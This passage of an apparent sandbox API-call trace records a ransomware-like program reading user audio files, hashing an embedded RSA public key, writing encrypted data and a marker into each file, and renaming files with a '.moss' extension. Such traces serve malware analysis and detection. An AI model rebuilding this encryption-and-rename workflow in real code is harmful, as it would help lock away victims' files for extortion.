(HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0171.586] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0171.586] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0171.586] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0171.586] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4dec0 [0171.586] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0171.586] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0171.586] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0171.586] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4de90 [0171.586] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0171.586] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4ddb8 [0171.586] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0171.586] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd280 [0171.587] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0171.587] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddd0 [0171.587] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0171.587] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dde8 [0171.587] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0171.587] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4ded8 [0171.587] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddd0 | out: hHeap=0xcd0000) returned 1 [0171.587] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4ddd0 [0171.587] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dde8 | out: hHeap=0xcd0000) returned 1 [0171.587] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd300 [0171.587] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0171.587] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0171.587] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0171.587] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0171.587] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dea8 | out: hHeap=0xcd0000) returned 1 [0171.587] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4dea8 [0171.587] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0171.587] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b44ac8 [0171.587] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dd70 | out: hHeap=0xcd0000) returned 1 [0171.587] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2470 [0171.587] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddd0 | out: hHeap=0xcd0000) returned 1 [0171.588] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b48820 [0171.588] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0171.588] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0x3aa26a0 [0171.588] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0171.588] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa27b8 [0171.588] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dea8 | out: hHeap=0xcd0000) returned 1 [0171.588] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b48a38 [0171.588] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0171.588] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xdc53e8 [0171.588] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0171.588] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ebf0 | out: hHeap=0xcd0000) returned 1 [0171.588] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0171.588] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0171.588] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0171.588] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa27b8 | out: hHeap=0xcd0000) returned 1 [0171.588] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.588] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48a38 | out: hHeap=0xcd0000) returned 1 [0171.588] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0171.588] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0171.588] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ded8 | out: hHeap=0xcd0000) returned 1 [0171.588] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0171.589] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0171.589] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0171.589] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dec0 | out: hHeap=0xcd0000) returned 1 [0171.589] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4de90 | out: hHeap=0xcd0000) returned 1 [0171.589] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0171.589] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0171.589] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0171.589] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4de78 | out: hHeap=0xcd0000) returned 1 [0171.589] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ca18 | out: hHeap=0xcd0000) returned 1 [0171.589] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44ac8 | out: hHeap=0xcd0000) returned 1 [0171.589] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0171.589] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cad8 | out: hHeap=0xcd0000) returned 1 [0171.589] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0171.589] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0171.589] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0171.589] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0171.589] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0171.589] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0171.589] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0171.589] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.589] WriteFile (in: hFile=0x664, lpBuffer=0x3b62d40*, nNumberOfBytesToWrite=0xb0b5, lpNumberOfBytesWritten=0x401fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b62d40*, lpNumberOfBytesWritten=0x401fb14*=0xb0b5, lpOverlapped=0x0) returned 1 [0171.590] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b62d40 | out: hHeap=0xcd0000) returned 1 [0171.590] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xb0ba, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.590] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.590] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0171.590] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71ba0 [0171.590] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b48820 [0171.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b48820, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0171.590] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48c50 [0171.590] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.590] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71ba0 | out: hHeap=0xcd0000) returned 1 [0171.590] WriteFile (in: hFile=0x664, lpBuffer=0x3b48c50*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48c50*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0171.591] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48c50 | out: hHeap=0xcd0000) returned 1 [0171.591] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0171.591] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0171.591] CloseHandle (hObject=0x664) returned 1 [0171.593] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ebf0 [0171.593] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x890) returned 0x3b4b098 [0171.593] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ebf0 | out: hHeap=0xcd0000) returned 1 [0171.593] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DENcIRfHVVVix5\\KdAWNP-F.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dencirfhvvvix5\\kdawnp-f.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DENcIRfHVVVix5\\KdAWNP-F.mp3.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dencirfhvvvix5\\kdawnp-f.mp3.moss")) returned 1 [0171.594] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.594] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.594] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.596] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e3280 | out: hHeap=0xcd0000) returned 1 [0171.596] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x639b7db0, ftCreationTime.dwHighDateTime=0x1d5e51b, ftLastAccessTime.dwLowDateTime=0xf1574a90, ftLastAccessTime.dwHighDateTime=0x1d5dc28, ftLastWriteTime.dwLowDateTime=0xf1574a90, ftLastWriteTime.dwHighDateTime=0x1d5dc28, nFileSizeHigh=0x0, nFileSizeLow=0x8958, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="M2WH.wav", cAlternateFileName="")) returned 1 [0171.596] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.596] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa6) returned 0x35e3280 [0171.596] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.596] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DENcIRfHVVVix5\\M2WH.wav") returned=".wav" [0171.596] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DENcIRfHVVVix5\\M2WH.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dencirfhvvvix5\\m2wh.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.596] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=35160) returned 1 [0171.596] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.601] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x8932, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.601] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.602] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.602] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.602] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.603] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x8958, lpOverlapped=0x0) returned 1 [0171.603] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.603] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0171.603] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.604] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.604] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0171.605] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.605] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.605] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.605] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0171.605] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.605] GetLastError () returned 0x0 [0171.606] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.606] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0171.606] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.606] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.606] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.606] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.606] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.606] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.606] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.606] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8960) returned 0x3b53ea8 [0171.606] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0171.606] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0171.606] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0171.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b44498 [0171.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0171.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4ca18 [0171.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4de78 [0171.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4ca60 [0171.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4de90 [0171.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dec0 [0171.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddb8 [0171.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ded8 [0171.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0171.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0171.607] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0171.607] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dec0 | out: hHeap=0xcd0000) returned 1 [0171.607] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ded8 | out: hHeap=0xcd0000) returned 1 [0171.607] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0171.607] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0171.607] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddb8 [0171.608] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd290 [0171.608] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4ded8 [0171.608] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0171.608] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x3b4dec0 [0171.608] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd320 [0171.608] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0x3aa2588 [0171.608] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0171.608] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0171.608] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0171.608] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa26a0 [0171.608] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a70 [0171.608] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0171.608] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0171.608] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ded8 | out: hHeap=0xcd0000) returned 1 [0171.608] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0171.608] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dec0 | out: hHeap=0xcd0000) returned 1 [0171.608] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0171.608] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0171.608] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0171.608] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0171.608] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0171.609] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0171.609] GetCurrentThreadId () returned 0x324 [0171.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x3b44690 [0171.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b4eff8 [0171.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0171.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ebf0 [0171.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35ceae8 [0171.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0171.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0171.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35deb08 [0171.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0171.609] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0171.609] GetCurrentThreadId () returned 0x324 [0171.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0171.609] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0171.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0171.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0171.609] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 